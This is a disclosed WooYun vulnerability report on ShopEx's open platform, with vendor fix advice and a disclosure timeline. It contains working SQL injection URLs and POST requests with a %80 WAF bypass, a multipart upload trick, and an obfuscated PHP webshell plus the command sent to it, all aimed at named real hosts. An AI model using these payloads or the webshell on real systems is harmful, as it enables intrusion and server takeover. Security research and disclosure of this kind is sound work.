破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

Shopex开放平台SQL注入和Getshell

编号160847
Urlhttp://www.wooyun.org/bug.php?action=view&id=160847
漏洞状态厂商已经确认
漏洞标题Shopex开放平台SQL注入和Getshell
漏洞类型SQL注射漏洞
厂商ShopEx
白帽子loopx9
提交日期2015-12-14 19:10:00
公开日期2016-01-28 17:10:00
修复时间(not set)
确认时间2015-12-14 00:00:00
Confirm Spend0
漏洞标签信息泄露 源码审计
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank15
漏洞简介
SQL注入.
漏洞细节

BBScan 扫到一个git信息泄露:

http://open.shopex.cn/.git/


使用rip-git.pl把源码下载下来.
源码审计发现一个sql注入:
open.shopex.cn\core\application\controllers\docs.php:

/**
* API接口搜索列表页
*
* @access public
*
* @return void
*/
public function api_search($category_id){
$this->data['navigations'][] = array('name'=>'开发文档','url'=>'');
$this->data['navigations'][] = array('name'=>'API文档','url'=>site_url('/docs/api_list/'.$category_id));
$platform_id = isset($_GET['platform_id'])?$_GET['platform_id']:0;
$docs_keyword = isset($_GET['docs_keyword'])?trim(urldecode($_GET['docs_keyword'])):'';
$method_type_id = isset($_GET['method_type_id'])?$_GET['method_type_id']:0;
/**
*
* 开发文档页改变布局
*/
$this->layout->Layout('doc_details');
/**
*
* 加载API列表模型,并获取API列表数据
*/
$this->load->model('method_type_model');
$api_list_data_temp = $this->method_type_model->get_api_list_all();
foreach($api_list_data_temp as $k=>$v){
$api_list_data[$v['id']] = $v;
}
$this->data['api_list_data'] = $api_list_data;
/**
*
* 支持平台列表
*/
$this->load->model('platform_model');
$platform_list = $this->platform_model->get_platform_list();
$this->data['platform_list'] = $platform_list;
/**
*
* 条件过滤
*/
$conditions = '1=1';
if($platform_id>0){
$conditions.= ' AND pm.platform_id='.$platform_id;
}
if($docs_keyword!=''){
$conditions.= ' AND (m.name like "%'.$docs_keyword.'%" OR m.introduction like "%'.$docs_keyword.'%")';
}
/**
*
* 左边筛选使用
*/
$this->load->model('method_model');
$filter_method_list = $this->method_model->get_method_search_list($conditions);//接口列表
$method_type_id_array = array();
foreach($filter_method_list as $k=>$v){
$method_type_id_array[] = $v['method_type_id'];
}
if($method_type_id>0){
$conditions.= ' AND mthm.method_type_id='.$method_type_id;
}
/**
*
* 加载API接口模型
*/
$this->load->model('method_model');
$method_list_temp = $this->method_model->get_method_search_list($conditions);//接口列表
foreach($method_list_temp as $k=>$v){
$temp = isset($api_list_data[$v['method_type_id']])?$api_list_data[$v['method_type_id']]['name']:'temp';
$method_list_group[$temp][] = $v;
}
$this->data['method_list_group'] = $method_list_group;
$this->data['method_type_id_array'] = $method_type_id_array;
$this->data['docs_keyword'] = $docs_keyword;
$this->data['platform_id'] = $platform_id;
$this->data['category_id'] = $category_id;
$this->data['method_type_id'] = $method_type_id;//当前列表ID
$this->layout->view('docs/api_search',$this->data);
}


三个参数存在sql注入:

platform_id docs_keyword method_type_id


搜一下发现已经提交过了:
WooYun: Shopex开放平台某处SQL注入
WooYun: Shopex官方某平台存在SQL注入漏洞一枚
WooYun: ShopEx某分站存在注入
漏洞任没有修复,但上了waf.
程序是CI框架,默认过滤掉了参数中的utf-8字符,所以在关键字中插入一个%80就能绕过waf了。

http://open.shopex.cn/docs/api_search/1?platform_id=1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23


1.png


2.png


继续翻代码,找到一处任意文件上传:
open.shopex.cn\core\application\controllers\uploads.php:

class Uploads extends CI_Controller {
/**
* 首页图片上传
*
* @access public
*/
public function home_img(){
if(empty($_FILES['image'])){
$this->_return_msg('fail','上传内容格式不对!');
}
if(substr($_FILES['image']['type'],0,5)!='image'){
$this->_return_msg('fail','请确认上传的是图片!');
}
$image_name = $_FILES['image']['name'];
$image_name_exp = explode('.',$image_name);
$image_name = date('YmdHis').mt_rand(0,1).'.'.$image_name_exp[1];
$uploadfile = FCPATH.'uploads/home_img/'.$image_name;
move_uploaded_file($_FILES['image']['tmp_name'],$uploadfile);
$data['img'] = base_url('/uploads/home_img/'.$image_name);
$this->_return_msg('succ','成功',$data);
}...


利用php multipart/form-data 解析漏洞来绕过waf上传php shell:

POST /index.php/uploads/home_img HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 341
Content-Type: multipart/form-data; boundary=----,xxoo
------,xxoo
Content-Disposition: form-data; name="image"; filename="1.jpg"
Content-Type: image/png
------
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: image/png
<script language="php">@preg_replace('/./e','@'.str_rot13('riny').'(bas'.'e64_decode($_POST[c]))', 'x');</script>
------
------,xxoo--


shell:

http://open.shopex.cn/uploads/home_img/201512122130440.php


POST /uploads/home_img/201512122130440.php HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
c=ZWNobyBgaWQ7cHdkO2xhc3QgLTIwYDs=


3.png


另外还有一个sql注入:

POST /index.php/passport/passport/login HTTP/1.1
Host: 122.144.135.142
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=368fe31461cc0ba9a3e38c0334145b35; CNZZDATA3868185=cnzz_eid%3D1466070748-1449902718-%26ntime%3D1449902718
Content-Length: 131
biz_id=&entid=')or updatexml(1,co%80ncat(0x7e,us%80er(),ver%80sion()),1)#&pwd=xx&auth_code=cqac&subOk=%E7%99%BB%E5%BD%95&logOk=true

POC

1.png


2.png


3.png

修复方案

删除.git目录或是禁止访问
修复sql注入.
上传功能限制后缀&用户权限控制

状态信息 2015-12-14: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-28: 细节向公众公开
厂商回复感谢您的提交,我们将尽快处理!!!
回应信息危害等级:高漏洞Rank:15 确认时间:2015-12-14 22:55
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

坐等公开啊..老板

带我玩02015-12-17 10:36:00